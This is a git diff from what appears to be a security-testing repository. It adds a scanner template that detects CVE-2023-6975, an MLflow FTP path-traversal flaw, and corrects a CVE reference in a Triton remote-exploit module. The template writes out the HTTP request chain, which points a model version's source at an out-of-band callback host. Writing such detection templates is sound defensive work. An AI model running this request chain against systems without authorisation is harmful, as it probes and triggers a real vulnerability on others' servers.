diff --git a/mlflow/mlflow-url-parsing-confusion-lfi.yaml b/mlflow/mlflow-url-parsing-confusion-lfi.yaml new file mode 100644 index 0000000..91c4cf7 --- /dev/null +++ b/mlflow/mlflow-url-parsing-confusion-lfi.yaml @@ -0,0 +1,41 @@ +id: mlflow-url-parsing-confusion-lfi +info: + name: MLflow FTP Path Traversal + author: kevin-mizu, byt3bl33d3r + severity: high + description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server. + reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cve-id: CVE-2023-6975 + cwe-id: CWE-29 + tags: mlflow,ml,cve,path-traversal + +variables: + experiment_name: "{{rand_text_alpha(6)}}" + +http: + - raw: + - | + POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{experiment_name}}"} + - | + POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"} + - | + GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/triton/triton_model_rce.py b/triton/triton_model_rce.py index 4154c58..ff5270d 100755 --- a/triton/triton_model_rce.py +++ b/triton/triton_model_rce.py @@ -38,7 +38,7 @@ metadata = { 'license': 'MSF_LICENSE', 'references': [ {'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'}, - {'type': 'cve', 'ref': 'CVE-2023-6025'} + {'type': 'cve', 'ref': 'CVE-2023-31036'} ], 'type': 'remote_exploit_cmd_stager', 'targets': [